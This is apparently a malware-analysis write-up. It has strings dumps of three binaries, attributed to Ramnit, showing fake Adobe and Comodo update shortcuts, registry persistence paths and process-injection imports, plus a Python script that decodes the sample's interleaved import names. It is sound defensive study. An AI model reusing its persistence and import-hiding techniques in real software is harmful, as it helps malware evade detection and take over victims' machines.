Size: 60416

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.reloc
;ORD.
MessageBoxA
user32.dll
CloseHandle
CreateFileA
GetFileSize
GetModuleFileNameA
GetTempFileNameA
GetTempPathA
ReadFile
SetFilePointer
VirtualAlloc
WinExec
WriteFile
lstrlenA
kernel32.dll
mydll.dll
DoWork
0#010I0j0y0
1%1+171=1C1I1T1_1k1
!This program cannot be run in DOS mode.
Rich?
.text
`.rdata
@.data
GJMTWZ48
This progr
m cannot b
 run in DO
 mode.
xRich&
.twxt
`.rdata
.data
L$$Pj
L$8Pj
:T$
D$8g
Z|$!
L$$Q
D$ RP
T$ QR
_^]2
Phs|
VhHp
_^]2
j&PR
PRh`p
j#Pj
Phiw
T$(C
VW"`p
VWh|w
VWhpw
_^][u
\SVW
S~W3
t$S]
QSh?
SSSVh
uXVh
t ;=
ySVW3
D$bQP
Ph,x
VWPh?
T$cQ
j#Pj
T$xj
D$8h
D$pj
T$tR
T$@Q
T$tRhpy
?u~hdy
_^][
SUVW
L$xj#QSr
D$tS
T$t/
L$tSQ
Qh z
T$tRW
R40z
uj86$
L$DP
T$th
t^Vh
_^][
j#Rj
L$,h
D$@h
uA_2
WWWV
WPUSV
j#Pj
UD~D$8h
L$@h
ND$8
D$Pht{
j&Pj
Rhd{
L$$R
L$,PQQj
L$LQ
j#Rj
D$ Rh
D$(h
PSVU
SVW3
j#PR
_^[9
Rj@SV
Qj@SVe
#PPV
~D/
t$$5
D$l|
_^]3
e^][
tISU
_^]3
_^]|
ti_^3
^3|[Y
_]^[Y
vVS3
D$ P
D$fP
L$9f
H8IH
|$0h(|
D$8QR
D$8QRP
D$8QRP
iSh8
|$8B
uuSSh8
u?h<
NWVS
u&WVS
_^[]
lstrcpyA
CancelI`
GetFilaAttributes
lstrca
lstrc
lstr
ualProtect
DeleteF
Free
ibrary
oseHandle
WaitForSi
gleObject
Sleep
tSystemDir
ctoryA
G:tModuleFil1NameA
F ndClose
metFileAttrZbutesA
nindNextFilxA
FindFi`stFileA
ReadFile
SetFilePo
nter
FileSize
CreateFile
WideCha
ToMultiByt
CopyFil
GetLas
Error
rtualFree
ERNEL32.dl
wsprin
USER32.
RegC
oseKey
R2gQueryValu)ExA
penKeyExA
RegSetVal^eExA
ReGCreateKeyEmA
ADVAPI32$dll
tSpecialFo
derPathA
ELL32.dll
S2_32.dll
??3@YAXP
fwri
fseek
fopen
?2@YAPAXI@
fprint
fread
ysprintf
ept_handle(3
strrc'r
__p__p#mptr
strJtr
renaCe
rand
srand
lime
__CuxFrameHandner
free
malloc
_beginthr
adex
move
MSVCR
.dll
itterm
djust_fdiv
StrStrI
SHLWAPI.
_file
ength
leno
uerverDll.dwl
sGorking
stbynam
nect
2.dll
getho
window
\syswow64
ShE11C0D
Softwar
\Google
11C0DESize
CcocCcrc
cactcecIcn
sctcacnccc
CeoeI2neieteieae eiezeea
otltet3t2t
tdtltlt
CHocUcncicncIctcicaclcivzcec
RcocgcScectcV
aclcucecEc
geOapbecne
deeyxEexxA
Afdfvfaf
fif3f2f.fd
lflf
dgeCflgohs
ekKledyc
chceclclcE
xcecccuctc
Schfe
lcla3e2q.d
clalg
SdHeGfefteSapc?xcdidadldF+odldddedrd
dadtdhdAd
LvovavdvIvMvovnvAv
SPesnsdsMsesksssasgsesA~
FfifnfffWfifnfdfo
wfEfxfAf
trtatntstl
atttetMtet
tstatgtet
Ddidsdpd
dtdcdhdMde
sdsdadgded
Gdedt
Mdedsdsdad
dedAd
oowoWoiono
ooowo
rbebabtbeb?bibnbdbobw?EbxbAb
Rr7rgrirsrtre5rrCrlrarsrOrErxrAr
GeeeteIeneVeueteSetea~teee
LlolqldlClulrlsiolrlAl
ssstsQsusi
tsMsesssss
sgses
efrf3f2f.f
flflf
ousutuTuhu
ueuauduMue
susuaugueu
nctad
ldla.eddla
ZawdQcu
eerrytSdyg
stdeemgIdn
froargmeaa
citodnx
GcectcScyc9ctcecmcDci\rceccctcocFcycAc
TbeKrbmbibnbabjbebPbrbobcqebsbsb
OvevtvCvuvr
rvevnvtvPv
vovcvevsvs
Ivdv
Cdrd
dadtdedPdr
odcdedsdsd
Vdidr
tdudadldFd
dededEdxd
OgpheensPa
cogchejsks
Vaigrcte
aagleAglhl
orcaEcxx
Wgreiatge
Pxrgoecseg+hseMsecmeo)rryg
Cc0henaateegR_edmeoxtgehxahgreesaddB
Gceate@xegresgihonnxEhxeAx
k0e0rxndefl
3a2g.cdale
Etxhi
taPgrhojcr
ascsa
acdcLcicbc
cacrcycWc
Lcocacdc
cicbcrcacr
ycAc
dtdMdodddu
ldedHdadnd
dldedAd
GgegtgPgrg
gcgAgdgdgr<egsgsg
aualataiaB$yataeaTaoamaiadaeaCahNaara
CmomTmymFmimlmetAm
CirieioitieiDiiirjeicitioiri
thThehmhph
hahthhhAh
GqeqtqFq
qlqeqAqtqt
rqiqbquqtq
qsqAq
eytyCyuyry
yeynytyTyh
ryeyaydyIy
Cwrwe
awtwewMwuwtwewxwAw
SbebtbFbib2bebAbtbtbr1ibbbubtbeb;bAb
VdiYrdtdudadldsdldldodcd
VcicrctcicaclcPcrcortceccctc
Raedmdodv
edDdidrded
dtdodrdydA
k0e0rx
deflg3a2g.
dflflf
aebtcMdoad
ualfeaFdia
feaNfaamfe
info
8202u39232B.log
%s\8^02u39232e.
%s\820du39232s.db
%s\8202us9232d.log
%sSize
KernelBaszGetGlobalDuta
Kernel32
%s%s
AutoE
dTasks
ontrol Pan
l\Desktop
Start
Soft
are\Micros
ft\Windows&CurrentVer
ion\Explor
r\User She5l Folders
%s%s%s
FTWARE\ClaKses\CLSID\
\InprocSerTer32
SOFTWVRE\Microsojt\Windows\BurrentVers
on\Explore
\ShellIcon
verlayIden
ifiers\360
DiskGuard
con Overla
rundll
FileBufSiz
%s\Adobe
lash Updat
d { %d}.ln
%s\Ado
e_FlashUpd
te.lnk
ava Sun
%s\Adobe_F*ashUpdate @ %d}.lnk
cunJavaErrrJr.log sI
Adobe_Fla|hUpdate.lno
\rundll
2.exe
%s\error.
%s\S
nJavaErrro
.log
\Jre
\Java
Sun Orcal
dll.log
rd.dll
\*.*
%s\Como
o Updated.
%sABC
comodo.l;g
%s.log
%s\360UdisUGuard.dll
rundll32
"%sAf.log"
\helpbr
\Javame
1827-EFAf-
FJALS_1343
.tmp
\Secu
ityLog.log
\Securi
yLog
sWork
%s\u
erinit.exe
taskhost.e
explo
er.exe
serinit.ex
Functi
nWork
%$\updateerr#r_2tmp.log
%s\updateeDror_2.log
\Sun OrcAl\Java\Jre
91827-EFAf'AFJALS_134
ws2_32.d
%u.%u.%
infoSi
020~0
:1d1i1
1*2_2w2
484^4
5*515=5l5
6i6s6}
17J7Q7v7
7Y8}8
;3;G;[;o;%;
<,<A<K<P<g
n<|<
<!=&=3=G=B=V=[=`=j=o>t=~=
>!>&>
>5>:>?>I>N
S>]>b>g>q>
?+?0@5???D?I?S?,?]?g?l?q?{V
0#0(0207
<0F0K0P0Z0C0d0q0v0{0
1(1F1K1
494a4g4m4
,5<5z5
6 6)
8$8t8
9$9/XX9y9
:.:U:`q
;0;f;
=&=.=c=
=*>9>@>t>g>x>
?E?N?f?{?
P0U0}0
>1w1
1?2h2{
3(3/3/46
<4H4Z4r4w4"4
5257
5g6"6W6\6
707:7\7c7
8^8v8
9*9C9c9h9G9
:$:X:s:
:(,0;O;V;e;};
<$=0<7<P<
=_=x
>5>r>
>+?0
e?j?
<0C0
1.1<1N1t1
1$272K
3Q3X3]3c3qNw3|3
3%4*4d4pS
5<5L5Sd
'6,6:6^6n6
6#7*7;7
8]8t8
=[2z=
0\0c0
70787>7I7V
^7l7q7v7{7D7
7T8p8
@1P1`1p1
SUVW
v:SV
^[_]
UVWS3
_^]3
_^][
D/D*
[zFF
Z.DJ
SUVW
j#Pj
Pj@USV
UQSV
RUSV
_^][
SUVW3
L$(Sj
L$4SS
j#PS
D$$P
T$(h
L$(h
T$$j
_^]3
PQSSh
v&SV
$_[^
hSVW
>"u:F
XPVSS
Sleep
GetFileAttributesA
GetModuleFileNameA
GetCurrentProcess
VirtualProtect
GlobalFree
ReadFile
GlobalAlloc
CloseHandle
GetFileSize
CreateFileA
lstrlenA
DeleteFileA
IsDebuggerPresent
WriteProcessMemory
VirtualProtectEx
ExitProcess
ContinueDebugEvent
WaitForDebugEvent
CreateProcessA
KERNEL32.dll
SendMessageA
FindWindowExA
MessageBoxA
USER32.dll
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
_beginthreadex
??2@YAPAXI@Z
fclose
fwrite
fopen
??3@YAXPAX@Z
sprintf
atoi
fread
_except_handler3
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
GetModuleHandleA
GetStartupInfoA
_filelength
_fileno
Bin.exe
TlsMain
0x0056E345
23.d
Warning
ocessA
Creat
32.dll
Process
inate
Term
%s\8202u3923pi.db
%s\8202u39232e.db
%s\8202u39232s.db
%s\8202u39232d.log
%s\len.txt
%s\start.txt
JMPTZ48b
%s "%s\8202u39232d.log" InF
ll32.exe
rund

Unicode Strings:
---------------------------------------------------------------------------
aKernelBas
.dll
@jjj
jjjj



=================================================
File: SunJavaErrror.log / 8202u39232d.log
MD5:  ba1e3b06c990e0c90e3a52ac7b4a42d4
Size: 36864

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
xRich&
.text
`.rdata
@.data
.reloc
L$$Pj
L$8Pj
L$$Q
D$ RP
T$ QR
_^]2
PhH|
VhHp
_^]2
j&PR
Pj@h
PRh`p
SUVW
j#Pj
VWh`p
VWh|w
VWhpw
_^][u
\SVW3
SVW3
QSh?
SSSVh
uXVh
t @=
$SVW3
Ph,x
Phlx
VWPh?
SUVW
j#Pj
T$xj
D$8h
D$pj
T$tRh
L$pj
T$@Q
T$tRhpy
u~hdy
_^][
SUVW
T$ h
Sj#PS
L$xj#QS
D$tS
L$tSQ
Qh z
T$tRW
Rh0z
L$Lh
uj8\$
L$DP
T$thxx
L$DP
t^Vh
D$DR
_^][
j#Rj
L$,h
D$@h
WWWV
WPUSV
j#Pj
L$0PQ
D$8h
L$@h
T$Hh
D$Pht{
j&Pj
Rhd{
L$$R
L$,PQQj
L$LQ
j#Rj
D$ Rh
D$(h
PSVU
SVW3
j#PR
Rj@SV
Qj@SV
u#PPV
_^]3
_^][
tISU
][_^
_^]3
8MZt
@TWUP
_]^[Y
vAS3
D$ P
D$ P
|$0h(|
D$<RP
D$8QRP
D$8QRP
D$8QRP
SSh8
uuSSh8
VHu/
NWVS
u7WPS
u&WVS
_^[]
lstrcpyA
CancelIo
GetFileAttributesA
lstrcatA
lstrcpynA
lstrlenA
VirtualProtect
DeleteFileA
FreeLibrary
CloseHandle
WaitForSingleObject
Sleep
GetSystemDirectoryA
GetModuleFileNameA
FindClose
SetFileAttributesA
FindNextFileA
FindFirstFileA
ReadFile
SetFilePointer
GetFileSize
CreateFileA
WideCharToMultiByte
CopyFileA
GetLastError
VirtualFree
KERNEL32.dll
wsprintfA
USER32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegSetValueExA
RegCreateKeyExA
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
WS2_32.dll
??3@YAXPAX@Z
fclose
fwrite
fseek
fopen
??2@YAPAXI@Z
fprintf
fread
sprintf
atoi
_except_handler3
strrchr
__p__pgmptr
strstr
rename
rand
srand
time
__CxxFrameHandler
free
malloc
_beginthreadex
memmove
MSVCRT.dll
_initterm
_adjust_fdiv
StrStrIA
SHLWAPI.dll
_filelength
_fileno
ServerDll.dll
sWorking
stbyname
nect
_32.dll
getho
windows\syswow64
ShE11C0DE
Software\Google
ShE11C0DESize
CcocCcrcecactcecIcncsctcacncccec
CeoeIeneieteieaeleiezeea
otltet3t2t.tdtltlt
CcocUcncicncictcicaclciczcec
RcecgcScectcVcaclcucecEcxcAc
RdefgeOapbecneKdeeyxEexxAa
Afdfvfafpfif3f2f.fdflflf
RaedgeCflgohsjekKledyc
SchceclclcEcxcecccuctcecAc
Schfeglcla3e2q.ddclalg
SdHeGfefteSapcexcdidadldFdodldddedrdPdadtdhdAd
LvovavdvIvcvovnvAv
SsesnsdsMsesssssasgsesAs
FfifnfdfWfifnfdfofwfEfxfAf
TtrtatntstltatttetMtetststatgtet
DdidsdpdadtdcdhdMdedsdsdadgdedAd
GdedtdMdedsdsdadgdedAd
SohooowoWoionodooowo
CbrbebabtbebWbibnbdbobwbEbxbAb
RrergrirsrtrerrrCrlrarsrsrErxrAr
GeeeteIenepeueteSeteaeteee
LlolaldlClulrlslolrlAl
PsossstsQsusistsMsesssssasgses
ufsfefrf3f2f.fdflflf
PuousutuTuhurueuauduMueususuaugueuAu
nctadbldla.eddlalg
ZawdQcuqeerrytSdygsstdeemgIdnxfroargmeaatcitodnx
GcectcScycsctcecmcDcicrceccctcocrcycAc
TbebrbmbibnbabtbebPbrbobcbebsbsb
GvevtvCvuvrvrvevnvtvPvrvovcvevsvsvIvdv
CdrdedadtdedPdrdodcdedsdsdAd
VdidrdtdudadldFdrdededEdxd
OgpheensParcogchejskse
VaigrcteuaagleAglhljorcaEcxx
WgreiatgeePxrgoecsegshseMsecmeodrryg
CcrhenaateegRhedmeoxtgehTahgreesaddc
GceateVxegresgihoenxEhxeAx
k0e0rxndeflg3a2g.cdalelg
EtxhictaPgrhojcreascsa
LcocacdcLcicbcrcacrcycWc
LcocacdcLcicbcrcacrcycAc
GdedtdMdodddudldedHdadndddldedAd
GgegtgPgrgogcgAgdgdgrgegsgsg
MaualataiaBayataeaTaoaWaiadaeaCahaaara
CmompmymFmimlmemAm
CirieiaitieiDiiirieicitioiriyiAi
GhehthThehmhphPhahthhhAh
GqeqtqFqiqlqeqAqtqtqrqiqbquqtqeqsqAq
GyeytyCyuyryryeynytyTyhyryeyaydyIydy
CwrwewawtwewMwuwtwewxwAw
SbebtbFbiblbebAbtbtbrbibbbubtbebsbAb
VdidrdtdudadldAdldldodcd
VcicrctcucaclcPcrcoctceccctc
RaedmdodvdedDdidrdedcdtdodrdydAd
k0e0rxndeflg3a2g.fdflflf
GaebtcMdoadfualfeaFdialfeaNfaamfeaAa
info
FileBuf
%s\8202u392325.log
%s\8202u39232e.db
%s\8202u39232s.db
%s\8202u39232d.log
%sSize
KernelBaseGetGlobalData
Kernel32.dll
%s%s
%s\%s
AutoEndTasks
Control Panel\Desktop
Startup
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
%s%s%s
SOFTWARE\Classes\CLSID\
\InprocServer32
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\360UDiskGuard Icon Overlay
rundll
FileBufSize
%s\Adobe Flash Updated { %d}.lnk
%s\Adobe_FlashUpdate.lnk
Java Sun
%s\Adobe_FlashUpdate { %d}.lnk
SunJavaErrror.log sI
Adobe_FlashUpdate.lnk
\rundll32.exe
%s\error.log
%s\SunJavaErrror.log
\DATAS
\Jre
\Java
\Sun Orcal
dll.log
Guard.dll
\*.*
%s\Comodo Updated.lnk
%sABC
comodo.log
%s.log
%s\360UdiskGuard.dll
rundll32.exe
"%s\f.log"
\helper
\Javame
91827-EFAf-AFJALS_13432.tmp
\SecurityLog.log
\SecurityLog
Guard
sWorking
%s\userinit.exe
taskhost.exe
explorer.exe
userinit.exe
FunctionWork
%s\updateerror_2tmp.log
%s\updateerror_2.log
\Sun Orcal\Java\Jre
91827-EFAf-AFJALS_13435
ws2_32.dll
%u.%u.%u.%u
infoSize
020~0
1-1:1d1i1
1*2_2w2
484^4
5$5*515=5l5
6i6s6}6
717J7Q7v7
7Y8}8
;3;G;[;o;u;
<%<,<A<K<P<g<n<|<
<!=&=3=G=L=V=[=`=j=o=t=~=
>!>&>+>5>:>?>I>N>S>]>b>g>q>v>{>
?+?0?5???D?I?S?X?]?g?l?q?{?
0#0(02070<0F0K0P0Z0_0d0q0v0{0
1(1F1K1
203T3w3
494a4g4m4s4
4,5<5z5
6 6)6P6
8$8t8
9$9/9X9y9
:.:U:`:
;0;f;
=&=.=c=
=*>9>@>`>g>x>
?#?E?N?f?{?
0F0P0U0}0
0>1w1
1?2h2{2
3(3/3/464<4H4Z4r4w4
52575r5
6"6W6\6
707:7\7c7x7
8G8^8v8
9*9C9c9h9
:$:X:s:
:(;0;O;V;e;};
<$<0<7<P<
=_=x=
>5>r>
>+?0?e?j?
<0C0u0
1.1<1N1t1
1$272K2R2
3Q3X3]3c3q3w3|3
3%4*4d4p4
5<5L5S5
6'6,6:6^6n6
6#7*7;7
8]8t8
=[=z=
0\0c0
6"70787>7I7V7^7l7q7v7{7
7T8p8
@1P1`1p1

Unicode Strings:
---------------------------------------------------------------------------
jjjj
aKernelBase.dll
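
The run of strings from CcocCcrcecactcecIcncsctcacncccec through GaebtcMdoadfualfeaFdialfeaNfaamfeaAa above is the DLL's import list with one filler character inserted after every real character (CoCreateInstance with 'c', CoInitialize with 'e', LoadCursorA with 'l'; a few, such as RegOpenKeyExA, use varying filler). The decoder below is an added example, not code from the contagio post or from the sample. KNOWN_EXPORTS is a hand-picked seed list for the varying-filler case (in real use, feed it the export tables of the DLLs in scope); SAMPLE_BLOB is constructed here from strings copied from the dump plus two un-obfuscated decoys.

```python
"""Decode the interleaved import names from the 8202u39232d.log strings dump.

Added example (not code from the contagio post or from the Ramnit sample).
Every character at an odd offset of those strings is filler, so the real
name is the characters at even offsets.  A constant filler letter is
accepted on its own; a varying filler is accepted only when the decoded
name is in KNOWN_EXPORTS, which keeps plain CamelCase strings from being
"decoded" into nonsense.
"""
import re
import string

PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")

# Seed list (assumption for the example); load real export tables for real work.
KNOWN_EXPORTS = {
    "RegOpenKeyExA", "ZwQuerySystemInformation", "CreateRemoteThread",
    "WriteProcessMemory", "VirtualAllocEx", "OpenProcess", "GetVersionExA",
    "ExitProcess", "MultiByteToWideChar", "GetModuleFileNameA",
    "kernel32.dll", "ntdll.dll", "user32.dll",
}
NAME_RE = re.compile(r"^(?:[A-Za-z_][A-Za-z0-9_]{2,}|[A-Za-z0-9]+\.dll)$")


def ascii_strings(blob: bytes, min_len: int = 8):
    """Minimal equivalent of `strings -n 8`: runs of printable ASCII."""
    out, run = [], []
    for b in blob:
        ch = chr(b)
        if ch in PRINTABLE:
            run.append(ch)
            continue
        if len(run) >= min_len:
            out.append("".join(run))
        run = []
    if len(run) >= min_len:
        out.append("".join(run))
    return out


def deinterleave(s: str) -> str:
    """Keep the even-offset characters; drop the filler at odd offsets."""
    return s[::2]


def decode_import(s: str):
    """Return the recovered name, or None when s does not look interleaved."""
    if len(s) < 8 or len(s) % 2:
        return None
    name = deinterleave(s)
    filler = set(s[1::2])
    if len(filler) == 1 and NAME_RE.match(name) and len(set(name)) >= 4:
        return name                      # constant filler: high confidence
    if name in KNOWN_EXPORTS:
        return name                      # varying filler: needs a known name
    return None


def recover_imports(blob: bytes) -> dict:
    """Map each interleaved string found in blob to its decoded name."""
    found = {}
    for s in ascii_strings(blob):
        name = decode_import(s)
        if name:
            found[s] = name
    return found


# Constructed buffer: strings copied from the dump above, plus decoys that
# must be left alone, NUL-separated the way an import table lays them out.
SAMPLE_BLOB = b"\x00".join([
    b"CcocCcrcecactcecIcncsctcacncccec",
    b"otltet3t2t.tdtltlt",
    b"RdefgeOapbecneKdeeyxEexxAa",
    b"ZawdQcuqeerrytSdygsstdeemgIdnxfroargmeaatcitodnx",
    b"CcrhenaateegRhedmeoxtgehTahgreesaddc",
    b"WgreiatgeePxrgoecsegshseMsecmeodrryg",
    b"k0e0rxndeflg3a2g.cdalelg",
    b"LlolaldlClulrlslolrlAl",
    b"GetProcAddress",   # decoy: plain import name, even length
    b"KERNEL32.dll",     # decoy: plain DLL name
    b"L$$Pj",            # decoy: code bytes, too short for strings
])

if __name__ == "__main__":
    for raw, name in recover_imports(SAMPLE_BLOB).items():
        print(f"{raw:50} -> {name}")
```

Run it against the unpacked DLL rather than the strings listing: the same loop over the whole file recovers the list in one pass, and the names it returns (CreateRemoteThread, WriteProcessMemory, VirtualAllocEx, OpenProcess, ZwQuerySystemInformation next to the LoadLibrary/GetProcAddress pair) are the injector's real import set, which the plain import table of the DLL does not show.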

================================================================
File: 4.tmp
MD5:  6d2c12085f0018daeb9c1a53e53fd4d1
Size: 57344

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich?
.text
`.rdata
@.data
GJMTWZ48
This progr
m cannot b
 run in DO
 mode.
xRich&
.twxt
`.rdata
.data
L$$Pj
L$8Pj
:T$
D$8g
Z|$!
L$$Q
D$ RP
T$ QR
_^]2
Phs|
VhHp
_^]2
j&PR
PRh`p
j#Pj
Phiw
T$(C
VW"`p
VWh|w
VWhpw
_^][u
\SVW
S~W3
t$S]
QSh?
SSSVh
uXVh
t ;=
ySVW3
D$bQP
Ph,x
VWPh?
T$cQ
j#Pj
T$xj
D$8h
D$pj
T$tR
T$@Q
T$tRhpy
?u~hdy
_^][
SUVW
L$xj#QSr
D$tS
T$t/
L$tSQ
Qh z
T$tRW
R40z
uj86$
L$DP
T$th
t^Vh
_^][
j#Rj
L$,h
D$@h
uA_2
WWWV
WPUSV
j#Pj
UD~D$8h
L$@h
ND$8
D$Pht{
j&Pj
Rhd{
L$$R
L$,PQQj
L$LQ
j#Rj
D$ Rh
D$(h
PSVU
SVW3
j#PR
_^[9
Rj@SV
Qj@SVe
#PPV
~D/
t$$5
D$l|
_^]3
e^][
tISU
_^]3
_^]|
ti_^3
^3|[Y
_]^[Y
vVS3
D$ P
D$fP
L$9f
H8IH
|$0h(|
D$8QR
D$8QRP
D$8QRP
iSh8
|$8B
uuSSh8
u?h<
NWVS
u&WVS
_^[]
lstrcpyA
CancelI`
GetFilaAttributes
lstrca
lstrc
lstr
ualProtect
DeleteF
Free
ibrary
oseHandle
WaitForSi
gleObject
Sleep
tSystemDir
ctoryA
G:tModuleFil1NameA
F ndClose
metFileAttrZbutesA
nindNextFilxA
FindFi`stFileA
ReadFile
SetFilePo
nter
FileSize
CreateFile
WideCha
ToMultiByt
CopyFil
GetLas
Error
rtualFree
ERNEL32.dl
wsprin
USER32.
RegC
oseKey
R2gQueryValu)ExA
penKeyExA
RegSetVal^eExA
ReGCreateKeyEmA
ADVAPI32$dll
tSpecialFo
derPathA
ELL32.dll
S2_32.dll
??3@YAXP
fwri
fseek
fopen
?2@YAPAXI@
fprint
fread
ysprintf
ept_handle(3
strrc'r
__p__p#mptr
strJtr
renaCe
rand
srand
lime
__CuxFrameHandner
free
malloc
_beginthr
adex
move
MSVCR
.dll
itterm
djust_fdiv
StrStrI
SHLWAPI.
_file
ength
leno
uerverDll.dwl
sGorking
stbynam
nect
2.dll
getho
window
\syswow64
ShE11C0D
Softwar
\Google
11C0DESize
CcocCcrc
cactcecIcn
sctcacnccc
CeoeI2neieteieae eiezeea
otltet3t2t
tdtltlt
CHocUcncicncIctcicaclcivzcec
RcocgcScectcV
aclcucecEc
geOapbecne
deeyxEexxA
Afdfvfaf
fif3f2f.fd
lflf
dgeCflgohs
ekKledyc
chceclclcE
xcecccuctc
Schfe
lcla3e2q.d
clalg
SdHeGfefteSapc?xcdidadldF+odldddedrd
dadtdhdAd
LvovavdvIvMvovnvAv
SPesnsdsMsesksssasgsesA~
FfifnfffWfifnfdfo
wfEfxfAf
trtatntstl
atttetMtet
tstatgtet
Ddidsdpd
dtdcdhdMde
sdsdadgded
Gdedt
Mdedsdsdad
dedAd
oowoWoiono
ooowo
rbebabtbeb?bibnbdbobw?EbxbAb
Rr7rgrirsrtre5rrCrlrarsrOrErxrAr
GeeeteIeneVeueteSetea~teee
LlolqldlClulrlsiolrlAl
ssstsQsusi
tsMsesssss
sgses
efrf3f2f.f
flflf
ousutuTuhu
ueuauduMue
susuaugueu
nctad
ldla.eddla
ZawdQcu
eerrytSdyg
stdeemgIdn
froargmeaa
citodnx
GcectcScyc9ctcecmcDci\rceccctcocFcycAc
TbeKrbmbibnbabjbebPbrbobcqebsbsb
OvevtvCvuvr
rvevnvtvPv
vovcvevsvs
Ivdv
Cdrd
dadtdedPdr
odcdedsdsd
Vdidr
tdudadldFd
dededEdxd
OgpheensPa
cogchejsks
Vaigrcte
aagleAglhl
orcaEcxx
Wgreiatge
Pxrgoecseg+hseMsecmeo)rryg
Cc0henaateegR_edmeoxtgehxahgreesaddB
Gceate@xegresgihonnxEhxeAx
k0e0rxndefl
3a2g.cdale
Etxhi
taPgrhojcr
ascsa
acdcLcicbc
cacrcycWc
Lcocacdc
cicbcrcacr
ycAc
dtdMdodddu
ldedHdadnd
dldedAd
GgegtgPgrg
gcgAgdgdgr<egsgsg
aualataiaB$yataeaTaoamaiadaeaCahNaara
CmomTmymFmimlmetAm
CirieioitieiDiiirjeicitioiri
thThehmhph
hahthhhAh
GqeqtqFq
qlqeqAqtqt
rqiqbquqtq
qsqAq
eytyCyuyry
yeynytyTyh
ryeyaydyIy
Cwrwe
awtwewMwuwtwewxwAw
SbebtbFbib2bebAbtbtbr1ibbbubtbeb;bAb
VdiYrdtdudadldsdldldodcd
VcicrctcicaclcPcrcortceccctc
Raedmdodv
edDdidrded
dtdodrdydA
k0e0rx
deflg3a2g.
dflflf
aebtcMdoad
ualfeaFdia
feaNfaamfe
info
8202u39232B.log
%s\8^02u39232e.
%s\820du39232s.db
%s\8202us9232d.log
%sSize
KernelBaszGetGlobalDuta
Kernel32
%s%s
AutoE
dTasks
ontrol Pan
l\Desktop
Start
Soft
are\Micros
ft\Windows&CurrentVer
ion\Explor
r\User She5l Folders
%s%s%s
FTWARE\ClaKses\CLSID\
\InprocSerTer32
SOFTWVRE\Microsojt\Windows\BurrentVers
on\Explore
\ShellIcon
verlayIden
ifiers\360
DiskGuard
con Overla
rundll
FileBufSiz
%s\Adobe
lash Updat
d { %d}.ln
%s\Ado
e_FlashUpd
te.lnk
ava Sun
%s\Adobe_F*ashUpdate @ %d}.lnk
cunJavaErrrJr.log sI
Adobe_Fla|hUpdate.lno
\rundll
2.exe
%s\error.
%s\S
nJavaErrro
.log
\Jre
\Java
Sun Orcal
dll.log
rd.dll
\*.*
%s\Como
o Updated.
%sABC
comodo.l;g
%s.log
%s\360UdisUGuard.dll
rundll32
"%sAf.log"
\helpbr
\Javame
1827-EFAf-
FJALS_1343
.tmp
\Secu
ityLog.log
\Securi
yLog
sWork
%s\u
erinit.exe
taskhost.e
explo
er.exe
serinit.ex
Functi
nWork
%$\updateerr#r_2tmp.log
%s\updateeDror_2.log
\Sun OrcAl\Java\Jre
91827-EFAf'AFJALS_134
ws2_32.d
%u.%u.%
infoSi
020~0
:1d1i1
1*2_2w2
484^4
5*515=5l5
6i6s6}
17J7Q7v7
7Y8}8
;3;G;[;o;%;
<,<A<K<P<g
n<|<
<!=&=3=G=B=V=[=`=j=o>t=~=
>!>&>
>5>:>?>I>N
S>]>b>g>q>
?+?0@5???D?I?S?,?]?g?l?q?{V
0#0(0207
<0F0K0P0Z0C0d0q0v0{0
1(1F1K1
494a4g4m4
,5<5z5
6 6)
8$8t8
9$9/XX9y9
:.:U:`q
;0;f;
=&=.=c=
=*>9>@>t>g>x>
?E?N?f?{?
P0U0}0
>1w1
1?2h2{
3(3/3/46
<4H4Z4r4w4"4
5257
5g6"6W6\6
707:7\7c7
8^8v8
9*9C9c9h9G9
:$:X:s:
:(,0;O;V;e;};
<$=0<7<P<
=_=x
>5>r>
>+?0
e?j?
<0C0
1.1<1N1t1
1$272K
3Q3X3]3c3qNw3|3
3%4*4d4pS
5<5L5Sd
'6,6:6^6n6
6#7*7;7
8]8t8
=[2z=
0\0c0
70787>7I7V
^7l7q7v7{7D7
7T8p8
@1P1`1p1
SUVW
v:SV
^[_]
UVWS3
_^]3
_^][
D/D*
[zFF
Z.DJ
SUVW
j#Pj
Pj@USV
UQSV
RUSV
_^][
SUVW3
L$(Sj
L$4SS
j#PS
D$$P
T$(h
L$(h
T$$j
_^]3
PQSSh
v&SV
$_[^
hSVW
>"u:F
XPVSS
Sleep
GetFileAttributesA
GetModuleFileNameA
GetCurrentProcess
VirtualProtect
GlobalFree
ReadFile
GlobalAlloc
CloseHandle
GetFileSize
CreateFileA
lstrlenA
DeleteFileA
IsDebuggerPresent
WriteProcessMemory
VirtualProtectEx
ExitProcess
ContinueDebugEvent
WaitForDebugEvent
CreateProcessA
KERNEL32.dll
SendMessageA
FindWindowExA
MessageBoxA
USER32.dll
ADVAPI32.dll
SHGetSpecialFolderPathA
SHELL32.dll
_beginthreadex
??2@YAPAXI@Z
fclose
fwrite
fopen
??3@YAXPAX@Z
sprintf
atoi
fread
_except_handler3
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
GetModuleHandleA
GetStartupInfoA
_filelength
_fileno
Bin.exe
TlsMain
0x0056E345
23.d
Warning
ocessA
Creat
32.dll
Process
inate
Term
%s\8202u3923pi.db
%s\8202u39232e.db
%s\8202u39232s.db
%s\8202u39232d.log
%s\len.txt
%s\start.txt
JMPTZ48b
%s "%s\8202u39232d.log" InF
ll32.exe
rund

Unicode Strings:
---------------------------------------------------------------------------
aKer

nelBas
.dll
@jjj
jjjj
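
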